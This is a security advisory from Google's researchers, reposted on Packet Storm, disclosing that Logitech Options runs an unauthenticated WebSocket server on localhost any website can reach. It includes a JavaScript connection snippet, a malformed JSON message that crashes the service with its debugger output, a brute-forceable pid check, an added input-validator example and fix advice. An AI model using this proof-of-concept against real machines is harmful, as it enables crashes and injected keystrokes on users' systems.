Logitech Options Craft WebSocket Server Missing Authentication

Posted Dec 12, 2018
Authored by Tavis Ormandy, Google Security Research

The Logitech "Options" craft websocket server has no authentication.

tags | advisory
MD5 | 351cebf77410e506f6772f6e57f6204e

logitech: "Options" Craft WebSocket server has no authentication 
I wanted to rebind a button on my Logitech mouse on Windows, and apparently that requires installing a 149MB application called "Logitech Options":

https://www.logitech.com/en-us/product/options

That program helpfully adds itself to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (and therefore is always running), spawns multiple subprocesses and appears to be an Electron app. It also opens a WebSocket server on port 10134 that any website can connect to, and has no origin checking at all. A website can simply do this:

x = new WebSocket("ws://localhost:10134");
x.onmessage = function(event) {console.log("message", event.data); };
x.onopen = function(event) { console.log("open", event); };

etc, etc.

While trying to figure out what this WebSocket server does, it was immediately obvious that it expects JSON messages, and that there is zero type checking of properties, so it crashes like crazy.


socket.send(JSON.stringify({message_type: "tool_update", session_id: "00cd8431-8e8b-a7e0-8122-9aaf4d7c2a9b", tool_id: "hello", tool_options: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" }))

(14cc.cd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
LogiOptionsMgr+0x163f5f:
00000001`3f293f5f 0fb7530e movzx edx,word ptr [rbx+0Eh] ds:00004141`4141414f=????
0:013> kvn4
# Child-SP RetAddr : Args to Child : Call Site
00 00000000`03bae390 00000001`3f2939b3 : 00000000`03bae530 00000000`00000000 00004149`69696961 ffffffff`ffffffff : LogiOptionsMgr+0x163f5f
01 00000000`03bae3e0 00000001`3f55b2f9 : 00000000`03bae468 00000000`04d27e60 00000000`0053f180 00000001`3f295e6b : LogiOptionsMgr+0x1639b3
02 00000000`03bae430 00000001`3f554e74 : 00000000`03bae610 6470755f`6c6f6f74 00000000`0000000b 00000000`0000000f : LogiOptionsMgr+0x42b2f9
03 00000000`03bae5b0 00000001`3f544c5d : 00000001`3f793b10 00000000`03bae780 00000000`00547540 00000000`03812cc0 : LogiOptionsMgr+0x424e74

(Here, tool_options was expected to be an array, but the type was never checked and I provided a string.)
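The crash above is what happens when a handler dereferences a property without first checking its type. The following is an added example, not Logitech's code: a strict validator that checks every field of a message against an expected type before any handler sees it, using the field names from the crashing message above. The accepted types (a UUID session_id, a string tool_id, an array of option objects with a string name) are assumptions made for this example, as is the shape of the well-formed sample message.

```javascript
// Added example, not Logitech's code. Schema-checks a JSON message before any
// field is used, so a wrong-typed property is rejected instead of dereferenced.
// Field names come from the crashing message on the page; the expected types
// are assumptions made for this example.

const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;

// Own-property lookup only: "constructor" or "__proto__" must not match
// anything inherited from Object.prototype.
const has = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

const isString = (v) => typeof v === 'string';
const isUuid = (v) => isString(v) && UUID_RE.test(v);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);
// tool_options must be an array of objects, each with a string name (assumption).
const isOptionArray = (v) =>
  Array.isArray(v) && v.every((o) => isPlainObject(o) && isString(o.name));

// One schema per message_type; each field maps to a predicate that must hold.
const SCHEMAS = {
  tool_update: {
    session_id: isUuid,
    tool_id: isString,
    tool_options: isOptionArray,
  },
};

// Returns { ok: true, message } or { ok: false, reason }. Nothing in the
// message is touched by application code until this has returned ok.
function validateMessage(raw) {
  let msg;
  try {
    msg = JSON.parse(raw);
  } catch (e) {
    return { ok: false, reason: 'not valid JSON' };
  }
  if (!isPlainObject(msg)) {
    return { ok: false, reason: 'top level must be an object' };
  }
  if (!isString(msg.message_type) || !has(SCHEMAS, msg.message_type)) {
    return { ok: false, reason: 'unknown message_type' };
  }
  const schema = SCHEMAS[msg.message_type];
  for (const [field, check] of Object.entries(schema)) {
    if (!has(msg, field)) {
      return { ok: false, reason: `missing field ${field}` };
    }
    if (!check(msg[field])) {
      return { ok: false, reason: `bad type for ${field}` };
    }
  }
  // Reject fields the schema does not name, so a handler never receives
  // something it did not ask for.
  for (const field of Object.keys(msg)) {
    if (field !== 'message_type' && !has(schema, field)) {
      return { ok: false, reason: `unexpected field ${field}` };
    }
  }
  return { ok: true, message: msg };
}

// Constructed inputs: the message that crashed LogiOptionsMgr above
// (tool_options is a string), and a well-formed one (assumed shape).
const CRASHING = JSON.stringify({
  message_type: 'tool_update',
  session_id: '00cd8431-8e8b-a7e0-8122-9aaf4d7c2a9b',
  tool_id: 'hello',
  tool_options: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
});
const WELL_FORMED = JSON.stringify({
  message_type: 'tool_update',
  session_id: '00cd8431-8e8b-a7e0-8122-9aaf4d7c2a9b',
  tool_id: 'hello',
  tool_options: [{ name: 'ratchet', value: 1 }],
});

console.log(validateMessage(CRASHING));    // rejected: bad type for tool_options
console.log(validateMessage(WELL_FORMED)); // accepted
```

The validator runs before the message is dispatched on message_type, and it rejects rather than coerces: a string where an array was expected is an error, not something to wrap in an array and continue with.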

After figuring out some of the protocol, I realized it was this thing:

https://github.com/Logitech/logi_craft_sdk

The only "authentication" is that you have to provide a pid of a process owned by your user, but you get unlimited guesses, so you can brute-force it in microseconds.

After that, you can send commands and options, configure the "crown" to send arbitrary keystrokes, etc, etc.

Recommendations

*You must check origin* - discard any connection with a non-whitelisted Origin.

Second, require clients to know a secret generated at installation time and stored in a filesystem or registry location that is correctly ACL'd.



Found by: taviso

© 2019 Packet Storm. All rights reserved.